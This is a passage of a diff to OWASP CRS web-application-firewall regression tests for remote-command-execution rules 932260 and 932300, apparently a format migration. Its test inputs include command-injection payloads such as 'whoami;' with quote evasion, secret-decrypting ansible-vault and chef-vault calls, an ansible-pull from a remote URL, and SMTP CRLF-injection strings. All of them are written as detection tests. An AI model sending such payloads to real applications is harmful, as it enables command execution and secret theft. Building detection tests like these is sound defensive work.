[932260] + - test_id: 19 desc: "'ping' direct command injection FP test" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?x=ping%20127.0.0.1" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-20 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?x=ping%20127.0.0.1" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 20 desc: "FP for 'head of'" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "job_title=head%20of" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-21 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "job_title=head%20of" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 21 desc: "False positive test: 'evaluation' (FP while rule looks for 'eval')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=evaluation" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-22 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=evaluation" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 22 desc: "False positive test: 'schedule' (FP while rule looks for 'sched')" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get?word=schedule" - version: "HTTP/1.1" - output: - no_log_contains: id "932260" - - test_title: 932260-23 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get?word=schedule" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [932260] + - test_id: 23 desc: "FP with word comment Github Issue #3387" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=comment" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-24 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=comment" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 24 desc: "FP against name 'Perlak' (matches 'perl')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Perlak" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-25 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Perlak" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 25 desc: "FP against word 'Axel'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?first_name=Axel" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-26 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?first_name=Axel" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 26 desc: "FP with word performance" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?args=performance" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-27 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?args=performance" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 27 desc: "Block execution of perf command with arguments" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: "/post" - data: "args=perf --version" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-28 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: "/post" + data: "args=perf --version" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 28 desc: | Match despite quote evasion attempt. 932260 accidentally contained a chain rule for some time that enabled trivial bypasses, by excluding matches against number separators (see 932240). stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?a=whoami;0'0'\"" - version: HTTP/1.1 - output: - log_contains: id "932260" - - test_title: 932260-29 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?a=whoami;0'0'\"" + version: HTTP/1.1 + output: + log: + expect_ids: [932260] + - test_id: 29 desc: "FP against word 'Cronk'" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: GET - port: 80 - uri: "/get?last_name=Cronk" - version: HTTP/1.0 - output: - no_log_contains: id "932260" - - test_title: 932260-30 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: GET + port: 80 + uri: "/get?last_name=Cronk" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932260] + - test_id: 30 desc: "Block ad-hoc ansible commands" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible all -m ping - output: - log_contains: id "932260" - - test_title: 932260-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible all -m ping + output: + log: + expect_ids: [932260] + - test_id: 31 desc: "Block ansible config dump command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-config dump - output: - log_contains: id "932260" - - test_title: 932260-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-config dump + output: + log: + expect_ids: [932260] + - test_id: 32 desc: "Block installing collections from ansible galaxy" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-galaxy collection install community.general - output: - log_contains: id "932260" - - test_title: 932260-33 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-galaxy collection install community.general + output: + log: + expect_ids: [932260] + - test_id: 33 desc: "Block ad-hoc ansible commands using ansible-console" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-console - output: - log_contains: id "932260" - - test_title: 932260-34 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-console + output: + log: + expect_ids: [932260] + - test_id: 34 desc: "Block ansible-doc command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-doc plugin ping - output: - log_contains: id "932260" - - test_title: 932260-35 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-doc plugin ping + output: + log: + expect_ids: [932260] + - test_id: 35 desc: "Block dumping ansible inventory file and variables" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-inventory --list - output: - log_contains: id "932260" - - test_title: 932260-36 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-inventory --list + output: + log: + expect_ids: [932260] + - test_id: 36 desc: "Block ansible pull from remote repository" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-pull --url example.com - output: - log_contains: id "932260" - - test_title: 932260-37 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-pull --url example.com + output: + log: + expect_ids: [932260] + - test_id: 37 desc: "Block decrypting ansible secrets" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-vault decrypt secret - output: - log_contains: id "932260" - - test_title: 932260-38 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-vault decrypt secret + output: + log: + expect_ids: [932260] + - test_id: 38 desc: "Block execution of ansible playbooks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=ansible-playbook site.yml - output: - log_contains: id "932260" - - test_title: 932260-39 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=ansible-playbook site.yml + output: + log: + expect_ids: [932260] + - test_id: 39 desc: "Block decryption of secrets with chef-vault" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-vault -i secret - output: - log_contains: id "932260" - - test_title: 932260-40 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-vault -i secret + output: + log: + expect_ids: [932260] + - test_id: 40 desc: "Block execution of chef-shell command" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-shell - output: - log_contains: id "932260" - - test_title: 932260-41 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-shell + output: + log: + expect_ids: [932260] + - test_id: 41 desc: "Block execution chef recipie book" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-run all recipie.rb - output: - log_contains: id "932260" - - test_title: 932260-42 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-run all recipie.rb + output: + log: + expect_ids: [932260] + - test_id: 42 desc: "Block execution chef recipie book against a specific node" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=chef-client -t 1.1.1.1 - output: - log_contains: id "932260" - - test_title: 932260-43 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=chef-client -t 1.1.1.1 + output: + log: + expect_ids: [932260] + - test_id: 43 desc: "Block execution of visudo" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=visudo - output: - log_contains: id "932260" - - test_title: 932260-44 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=visudo + output: + log: + expect_ids: [932260] + - test_id: 44 desc: "Block execution of CrowdSec cscli" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - version: HTTP/1.0 - data: | - code=cscli alerts list - output: - log_contains: id "932260" - - test_title: 932260-45 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + version: HTTP/1.0 + data: | + code=cscli alerts list + output: + log: + expect_ids: [932260] + - test_id: 45 desc: "Test for false positive with name Axel Smith" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: HTTP/1.1 - data: | - name=Axel Smith - output: - no_log_contains: id "932260" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.1 + data: | + name=Axel Smith + output: + log: + no_expect_ids: [932260] diff --git a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml index 3291d5d9d..d7c20aa4a 100644 --- a/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml +++ b/tests/regression/tests/REQUEST-932-APPLICATION-ATTACK-RCE/932300.yaml @@ -2,158 +2,157 @@ meta: author: "fzipi, azurit" description: "Remote Command Execution: SMTP Command Injection test cases" - enabled: true - name: 932300.yaml +rule_id: 932300 tests: - - test_title: 932300-1 + - test_id: 1 desc: "SMTP MAIL FROM Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aMAIL%20FROM%3A%3Ca%40b.com%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 2 desc: "SMTP MAIL FROM Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?text=We%20received%20this%20mail%20from%20Mars" - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?text=We%20received%20this%20mail%20from%20Mars" + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 3 desc: "SMTP Command Injection negative test 2" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20We%20finally%20received%20this%20mail%20from%3A%3Ctest%40coreruleset.org%3E%2C%20which%20means%20that%20we%20can%20do%20this%20finally. + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 4 desc: "SMTP EHLO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aEHLO%20test.com" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aEHLO%20test.com" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 5 desc: "SMTP Command EHLO Injection negative test using ehlo typo in text" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-6 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22hello%22%20so%20we%20say%20ehlo%3A%20coreruleset.org%20to%20all%21 + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 6 desc: "SMTP RCPT TO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 7 desc: "SMTP RCPT TO Command Injection true negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E - version: HTTP/1.0 - output: - no_log_contains: id "932300" - - test_title: 932300-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + textarea=Hello%21%20This%20text%20introduces%20a%20typo%20when%20saying%20%22receipt%20to%22%20so%20we%20say%20rcpt%20to%3A%20%3Ccoreruleset.org%3E + version: HTTP/1.0 + output: + log: + no_expect_ids: [932300] + - test_id: 8 desc: "SMTP VRFY TO Command injection positive test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" - version: HTTP/1.0 - output: - log_contains: id "932300" - - test_title: 932300-9 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/get?attackme=%0d%0aRCPT%20TO%3A%3CPostmaster%3E" + version: HTTP/1.0 + output: + log: + expect_ids: [932300] + - test_id: 9 desc: "SMTP Command Injection Full SMTP dialog negative test" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "*/*" - Host: "localhost" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: | - textarea=S%3A%20220%20foo.com%20Simple%20Mail%20Transfer%20Service%20Ready%0AC%3A%20EHLO%20bar.com%0AS%3A%20250-foo.com%20greets%20bar.com%0AS%3A%20250-8BITMIME%0AS%3A%20250-SIZE%0AS%3A%20250-DSN%0AS%3A%20250%20HELP%0AC%3A%20MAIL%20FROM%3A%3CSmith%40bar.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CJones%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20RCPT%20TO%3A%3CGreen%40foo.com%3E%0AS%3A%20550%20No%20such%20user%20here%0AC%3A%20RCPT%20TO%3A%3CBrown%40foo.com%3E%0AS%3A%20250%20OK%0AC%3A%20DATA%0AS%3A%20354%20Start%20mail%20input%3B%20end%20with%20%3CCRLF%3E.%3CCRLF%3E%0AC%3A%20Blah%20blah%20blah...%0AC%3A%20...etc.%20etc.%20etc.%0AC%3A%20.%0AS%3A%20250%20OK%0AC%3A%20QUIT%0AS%3A%20221%20foo.com%20Service%20closing%20transmission%20channel - version: HTTP/1.0 - output: - no_log_contains: id "932300" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "*/*" + Host: "localhost" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: | + 